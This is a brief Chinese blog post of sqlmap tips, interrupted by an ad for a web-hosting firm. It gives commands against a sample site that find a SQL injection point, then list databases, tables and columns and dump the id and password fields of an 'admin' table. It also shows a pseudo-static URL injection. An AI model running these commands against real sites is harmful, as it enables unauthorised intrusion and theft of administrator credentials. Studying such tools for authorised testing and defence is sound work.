SQLMAP实用技巧

基础版:

目前创新互联已为上千余家的企业提供了网站建设、域名、雅安服务器托管网站运营、企业网站设计、江城网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

  1. 检查注入点

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

  2. 列数据库信息

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

  3. 指定库名列出所有表

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

  4. 指定库名表名列出所有字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

  5. 指定库名表名字段dump出指定字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

SQLMAP伪静态注入:

注入页面:http://www.xxx.org/news/class/?103.htm

命令:python sqlmap.py -u “http://www.xxx.org/news/class/?103*.html”


当前名称:SQLMAP实用技巧
本文路径:http://hbruida.cn/article/pedssi.html